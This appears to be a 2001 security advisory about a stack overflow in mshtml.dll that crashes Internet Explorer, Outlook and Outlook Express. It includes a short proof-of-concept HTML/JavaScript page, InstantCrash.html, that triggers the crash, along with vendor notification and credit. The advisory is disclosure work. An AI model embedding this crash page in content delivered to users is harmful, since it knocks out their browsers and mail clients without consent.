Reported January 15, 2001, by Win2KSecAdvice

VERSIONS AFFECTED
  • Microsoft Internet Explorer 4.0 and later
  • Microsoft Outlook Express
  • Microsoft Outlook

DESCRIPTION

A low-risk stack overflow has been discovered in the .dll file responsible for parsing HTML. Any program such as Internet Explorer (IE), Outlook, and Outlook Express that uses mshtml.dll is vulnerable. This vulnerability is low risk because the overflow does not let intruders launch arbitrary commands but simply crash the affected program.

DEMONSTRATION

The following code was provided by Thor Larholm:

               

------------InstantCrash.html-----------------

<iframe id=test style="display:none"></iframe>
<script>
Larholm = \{\}; // Object literal
test.document.open(); // Stream data
test.document.write("<s"+"cript>top.Larholm.test=0</s"+"cript>");
delete Larholm;
Larholm = \{\}; // Crash
</script>

----------------------------------------------

VENDOR RESPONSE

Microsoft was notified on December 4, 2000. According to Thor Larholm, Microsoft will address this bug in the next service pack for IE.

CREDIT
Discovered by
Thor Larholm.